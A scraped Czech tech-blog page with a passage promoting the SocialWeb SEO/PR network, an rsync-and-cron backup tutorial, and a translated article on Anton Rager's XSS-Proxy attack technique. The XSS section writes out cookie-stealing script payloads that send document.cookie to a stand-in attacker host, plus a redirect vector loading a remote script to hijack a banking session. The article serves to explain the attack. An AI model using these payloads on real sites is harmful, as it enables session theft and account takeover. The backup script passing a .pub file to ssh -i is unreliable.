to, že každý z webů má návštěvnost, jen tak je pak možné tyto weby efektivně využívat pro SEO, linkbuilding, marketing a PR publikaci.Takže teď již máme webové stránky, strukturu, tým, obsah, návštěvnost a na závěr chci ukázat jak SocialWeb dokáže pomáhat například reklamce a nebo PR agentuře.Výhoda - využívání webů jiných uživatelů pro vaše potřebyTakže vaše privátní síť obsahuje dva weby, ty můžete využívat pro co chcete a jak chcete.Co když budou vaši klienti chtít publikaci PR článků na více jak vašich dvou webech?Co když je váš klient někdo, kdo chcete udělat PR na niche, který se k žádnému z vašich webů nehodí?Tohle se právě v SocialWebu dá skvěle řešit, tímto způsobem můžete propagovat služby, produkty zkrátka vytvářet publikace na jiných webech uživatelů SocialWebu, kteří to v nastavení každého jejich webu a nebo v nastavení kategorie povolí.Pro tyto případy existují tři scénáře.1. Agentura, která má své weby a chce publikovat také na jiných webech (dle obrázku)V této variantě máte zase několik možností, jedna z nich je, pokud chcete publikovat na jiných webech jiných uživatelů umožnit také publikaci jiným subjektům na vaše weby – tak můžete pokrývat náklady za publikaci na jiné weby tzv PR exchange.Nebo můžete mít tolik webů, že nebudete potřebovat další, takže si můžete umožněním publikace jiným přivydělávat a nebo můžete využívat jiné weby a platit za to..2. Agentura, která chce využívat webové stránky pro PR a linkbuilding avšak nemá své weby- V tomto případě existuje služba Prstudio.cz, ve které si můžete zakoupit kredit a vyhledávat weby pro publikaci a nebo prohledávat články pro nahrazení klíčových slov SEO odkazem – SocialWeb tak vlastně vůbec nepotřebujete.3. Agentura / Jednotlivec, který nemá o publikaci zájemNemusíte nic nikam publikovat, můžete jen vytvářet weby a tak na vašich webech vydělávat.

folder_openPřiřazené štítky

Výsledky vyhledávání v sekci Programování na dotaz server

Zálohování dat v Linuxu na externí server za pomoci Rsync a Cronu

access_time14.duben 2020personZdenek Slavik

Občas se stane, že potřebujete zautomatizovat zálohu dat synchronizací složek na dvou odlišných Linux serverech. Pokud je tohle váš případ, můžu vám poradit jak toto udělat na Linux systému Cent OS 7 nebo Debian.Výsledkem bude, že se Vám bude spouštět každé dvě hodiny automaticky synchronizace, která nahraje chybějící soubory na serveru B ze serveru A. 1. První se ujistěte, že máte nainstalován rsync a SSH ve vašem Linux operačním systému:sudo yum -y install ssh rsyncsudo apt install ssh rsync 2. Přihlašte se na server BNa serveru B vytvoříme složku kam budeme později nahrávat data ze serveru A. Pro přihlášení použijte ideálně root uživatele.2.1 - Vytvoříme na serveru B složkumkdir -p  /var/zaloha2.2 - Pomocí příkazu ss-keygen si necháme vygenerovat public key a private key, které budeme potřebovat a díky nimž později dokážeme rsync zautomatizovat (nebude potřeba zadávat heslo). Nevyplňujte passphrase, ani nic jiného - pouze klikejte na ENTER!ssh-keygen2.3 Takto vygenerovaný public key si ze serveru B zkopírujeme na server Ascp /root/.ssh/id_rsa.pub root@A.cz:/root/id_rsa.pub3. Přihlašte se na server AOpět ideálně jako root!3.1 - Vytvoříme soubor authorized_keysPostupujte přesně podle návodu, včetně oprávnění, jinak vám synchronizace nemusí fungovat.mkdir -p /root/.sshchmod 700 /root/.sshtouch /root/.ssh/authorized_keyschmod 600 /root/.ssh/authorized_keys3.2 - Vložíme do souboru authorized_keys public keyV kroku 2.3 jsme si na server A poslali public key a měli bychom jej najít zde: /root/.ssh/id_rsa.pub, takže si zkopírujeme obsah public key a vložíme do nově vytvořeného souboru authorized_keyscat /root/id_rsa.pub >> /root/.ssh/authorized_keys4. Přihlašte se na server BNyní máme vše připraveno, požadavek na synchronizaci budeme spouštět na serveru B a protože chceme naši synchronizaci zautomatizovat použijeme k tomu CRON ÚLOHU4.1 - Otevřete si soubor /etc/crontab4.2 - Na konec souboru crontab vložte:Zde můžete nastavit kdy se má synchronizace spouštět, níže se bude úloha spouštět každou hodinu, pokud ale chcete spouštět úlohu jedenkrát denně ve dvě ráno, pak můžete použít 0 2 * * *, pokud stejně jako já chcete spouštět cron jednou za hodinu pak použijte:0 * * * * root bash backup.sh4.3 - Vytvoříme backup.sh souborVytvořte si backup.sh soubor, třeba v root/backup.sh a vložte do něj obsah, například:#!/bin/sh/usr/bin/rsync -avz -e "ssh -i /root/.ssh/id_rsa.pub"  root@A.com:/var/lib/mysql   /var/zaloha To je všechno, nyní každou hodinu se spustí backup.sh a zkontroluje zda na serveru A ve složce var/lib/mysql nejsou nějaké soubory, které nejsou ve složce /var/zaloha na serveru B - pokud zjistí, že existují chybějící soubory - automaticky je odešle do složky /var/zaloha na serveru B.Rsync má zajímave flags, díky kterým můžete nastavit například to, že pokud soubor na serveru A neexistuje a na serveru B existuje, protože tam byl zazálohován můžete spouštět:#!/bin/sh/usr/bin/rsync -avz -e "ssh -i /root/.ssh/id_rsa" --delete root@A.com:/var/lib/mysql   /var/zalohaDíky tomu budou soubory na serveru B, které již neexistují na serveru A automaticky ze serveru B odstraněny!Dokumentace funkce rsync a hromady možností nastavení naleznete zde: https://www.samba.org/ftp/rsync/rsync.htmlA nezapomeňte restartovat váš cron:service crond restart

folder_openPřiřazené štítky

Výsledky vyhledávání v sekci Hacking na dotaz server

Pokročilé techniky xss (cross-site scripting)

access_time16.červen 2020personRedakce

Popis pokročilého Cross-Site-Scriptingu, se vzdálenou kontrolou v reálném čase, od autora aplikace XSS-proxy jménem Anton Rager. Cross Site Scripting (XSS) je mnoha vývojáři a security profesionály obvykle považován za málo závažnou bezpečnostní zranitelnost. Do dnešní doby vznikla řada projektů s poukazem na potencionální rizika XSS, ale problém je převažne na pokraji zájmu bezpečnostních expertů a to včetně širších souvislostí o které tady jde.Autor aplikace XSS proxy napsal a zveřejnil popis v naději, že se odlehčený pohled na věc změní. Cituji: Doufám, že tímto dokumentem a vydáním nástroje pod jménem XSS-proxy (popsáno níže) změním pohled na celou situaci. XSS-Proxy umožňuje plnou kontrolu XSS útoků vzdáleným uživatelem (útočníkem). Tento dokument popisuje obvyklé XSS útoky a představuje nové metody/nástroje pro vytváření interaktivních XSS útoků, obojsměrných útoků a ještě více zla.Nejedná se o detailní návod (XSS howto), ale o širší vysvětlení metod XSS útoků. CGISecurity XSS FAQ (1) je dobrý zdroj pro celkový pohled na problematiku hlavních XSS zranitelností. V závěru textu jsou reference (2,3,4,5) obsahujíci skvělý materiál pro navazujíci XSS témata.Projekt XSS-proxy nevznikl jako platforma pro diskuzi a řešení. Existuje celá řada zdrojů, metod a možností pro hlášení chyb nebo opravování XSS děr. Pokročilé metody XSS které budou v textu představeny obcházejí mnoho metod aplikovaných proti XSS zranitelnostem. Doporučené čtení o hidden form inputs, URL re-writing, POST methods častokrát podsouvají řešení které nejsou 100% učinné, obzvlásť v případě, že má útočník přístup ke stejnému obsahu (a jscript/values) jako jeho oběť. Zbavit se všech speciálních HTML znaků nebo precizní filtrování vstupu je k ničemu v případě, že existuje neobjevený způsob jak vstup obelstít. Řešením může být rozdelení webových stránek na četné dokumentové domény, kde bude pro útočníka mnohem obtížnější provést/najít XSS útok/zranitelnost v porovnání s jediným místem kde je vše pohromadě. CGI vyhledávání na stránce v jedné subdoméně a citlivé oblasti na další(ch) může být užitečné.Pozadí XSSJako mnoho z vás ví, běžné XSS útoky vycházejí typicky ze dvou základních principů:1 – Útočník uploaduje <script> tag do veřejného fóra, blogu nebo stránek které navštevují uživatelé a obsahují XSS zranitelnost. Útočník pak díky přístupu získa (harvesting cookies) cookies webové stránky ze kterých vyčte řadu důležitých informací a díky tomu častokrát i přítpup k uživatelským účtum. Útoky jsou ale někdy využitelné mnohem hlouběji. Zde je to co myslím a říkam mnoha lidem co XSS přesně znamená. Příklad:Někdo chce odeslat následujíci kód na utocnik.com aby to další uživatelé sprocesovali.<script>document.write(„<img src=http://utocnik.com/“ + document.cookie + „>“)</script>Je to pokus o získání obrázku ze serveru útočníka pomocí cookies uživatele blogu priklad.com v URL.2 – Útočník použije veřejný web náchylný na útok XSS jak bylo uvedeno nahoře, nebo email zprávu založenu na XSS pro přesměrování uživatele na druhý server zranitelný pomocí XSS. Druhý server je aktuální cíl útočníka a stránka samozřejme obsahuje vlastní XSS zranitelnost, kde nic netušíci uživatel injektuje obsah <script> do dokumentu, který navenek pouze vidí. To v kombinaci s přesměrováním z dalšího webu umožňuje podvržení cookies, podvržení form/submit obsahu nebo specifickou akci XSSnutého uživatele proti dalšímu webu. Tato metoda je hodně rozšířena ale pramálo admiínistrátorů chápe, že se jedná o způsob útoku. Jak to funguje?Někdo chce odeslat následujíci kód na priklad.com aby to další uživatelé sprocesovali. <script>document.location=’http://ebanking.com/search?name=<script>document.write(„<img src=http://utocnik.com/“ + document.cookie + „>“)</script>'</script>Moment kdy je uživatel přesměrován na ebanking.com s hořejší XSS, toto je to co se vrátí uživateli a bude spuštěno:<script>document.write(„<img src=http://utocnik.com/“ + document.cookie + „>“)</script>To je pokus o získání obrázku ze serveru útočníka s cookies uživatele ebanking.com v URL.V minulosti hodně lidí zdůrazňovalo, že pokročilou manipulaci s webovým obsahem lze dosáhnout s XSS skriptem otevirajícím IFRAME (nebo další windows-like element) a loads/submits pro další dokumenty na stejné stránce. Důvěra v DOM umožňuje přítomnost Javascriptu v dokumentech a dovoluje interakci s dalšími windows/IFRAME, do doby než budou okna směrována do stejné dokumentové domény (protokol + domain_name + port).Aktuální metody XSS útoků jsou typicky limitovány pro jednu transakci a ve výsledku pouze v rámci cílové stránky, cookie harvesting nebo podvržení formuláře (form submission leakage). Zásady XSS-Proxy / ÚtokuXSS-Proxy rozšířuje běžné XSS útoky a kombinuje je s možností vykonání dalších Javascript příkazů, z libovolného vzdáleného serveru (viz Javascript Remoting reference číslo (6) pro detaily s IFRAME) pro možnost XSS být více než-li přesměrování s únikem cookies. Tato kombinace útočnikovi umožňuje ustavit stabilní, obousměrný kontrolní/přenosový kanál na oběť XSS a tím přistupovat na XSSnuté webové stránky s identitou oběti. Po celou dobu co má oběť útočníka otevřené XSS okno má útočník totální kontrolu nad prohlížečem oběti oproti XSS stránce s možností přesměrování na další stránky zranitelné XSS, nebo předání specifického blind requestu dalším serverům (viz reference číslo (3) provádění Cross-Site-Request-Forgeries aka CSRF a reference číslo (4) pro Session-Riding).Zmíněné situace lze dosáhnou s jedním nebo druhým útokem popsaným nahoře, teď se pokusíme názorně popsat příklad dvojího XSS přesměrování serveru. Oběť dostane XSS vektor pomocí blogu, diskuzního boardu, emailem atp. (předpokládaejme, že oběť surfuje na webech kde je možné vytvořit XSS – zavoláme stránku spatnyblog.com) a Javascript obsah přesměruje uživatele na druhou stránku (zavoláme druhou stránku ebanking.com a předpokládame samozřejmě, že stránka obsahuje XSS vo vyhledávací funkci, takže můžeme opakovat pomocí GET). Přesměrovací URL referuje na refers to a napadnutelnou část (cgi/etc) na druhém serveru což způsobý odezvu serveru která bude obsahovat Javascript příkaz útočníka který oběť vykoná.Inicializační XSS vektor na spatnyblog.com bude vypadat nějak takhle:<script>document.location=“http://ebanking.com/search?name=<script src=’http://utocnik.com/xss.js‘></script>“</script>Okno oběti teď má dokumentovou doménu ebanking.com a Javascript příkazy běží na doméně. Díky Javascript oběť posílá requesty na http://utocnik.com pro další skriptové příkazy. Nástroj XSS-Proxy aktuálně běží na utocnik.com a posyktuje další Javascripty pro inicializaci klientské části obsahujíci třeba funkce pro čtení dokumentů, procesování, přesměrování odpovědí, manipulaci chyb (error handling), stejně jako další příkazy pro vytvoření IFRAME, načtení root dokumentu (/) na cílovém serveru (ebanking.com) do IFRAME, načtení trvá pár vteřin, čtení obsahu (za použití innerHTML), pak následují další požadavek skriptů na http://utocnik.com. To vypadá komplexně ale jedná se pouze o několik řešení a reference časovač pro více volání skriptu na XSS-Proxy server. Funkce zůstanou v paměti až do doby než se okno oběti změní. Co se stane když od oběťi odejdou na http://utocnik.com subsekvenční skript requesty? Aktuálně se stanou dvě věci:1 – Obsah dokumentu v IFRAME (výsledky innerHTML pro daný objekt) jsou podvrženy do URL v skript requestu. Requesty skriptu jsou pouze GET, takže všechny volání skriptu obětí jsou jako volání normálniho dokumentu a ukládají parm/info na URL za jméno skriptu/stránky. Toto volání skriptu způsobý na serveru útočníka něco jako:GET /xss.js?data=Encoded_innerHTML_Contents HTTP/1.1Je to o něco víc komplexnější než to, že IE limituje délku URL (na přibližně 2049 znaků), takže většina dokumentů bude potřebovat naporcovat na části, které se na skritp URL request budou schopny dát dohromady. Aktuální nástroje se s tímto snaží vypořádat tak, že umísťují do URL dotazů přídavné informace pro znovusestavení (podobně jak to funguje u TCP/IP paketů).2 – Server na http://utocnik.com odpoví na poslední požadavek skriptu s více skirpt příkazy pro zachování trvání. Server buďto odpoví pomocía.) loop requestu (obyčejně řekne oběti počkej pár vteřin, pak znovu zkontroluj zda-li existují další příkazy skriptu)b.) dokument requestu (vlož dokument do IFRAME, přečti ho a přepošli výsledky pokud tě o to skript požádá)c.) submit requestu (nastav hodnoty vstupu ve formuláři s IFRAME, odešli, čekej na odpověď, přečti odpověď přepošli výsldek zpátky pokud o to skript požádá).Nebo pomocí javascript var/funkce požadavek na vyhodonocení (vyhodnoť výraz uvnitř aktuálniho okna v prohlížeči oběti a vrať výsledek+get příkazy). Proces pokračuje tak dloho jak oběť setrváva na stejné stránce.Zde je ASCII vizualizace okna a vysvětlení v souvislostech s cílem útočníka, po tom co je oběť přesměrována na finálni cíl a inicializován únos session:Existuje řada metod pro zamaskování aktuálniho „rezidentního“ okna pro útok (attack window) nebo IFRAME zaváděče. Celé okno lze schovat, stejně tak zrušit původní obsah stránek nebo proste použít skrytý IFRAME. Nástroj XSS-Proxy o kterém mluvíme, necháva okno včetně IFRAME pro oběť viditelné, ale modifikace je triviální (třeba interaktivně s Javascript Eval from). Existují i metody jak donutiti uživatele otevřít nové okno a obejít blokování pop-up oken. Jak? XSS proces přepíše odkazy v originálním dokumentu a otevření okne je pak pouze otázkou kliku. Nové oknomůže být kopii (zrcadlem) toho co si uživatel právě prohlíží, nebo výsledek odkliknutého odkazu ve veřejném XSS dokumentu a zmanipuluje oběť tak, že okno kontrolované XSS nechá běžet když dál surfuje.

folder_openPřiřazené štítky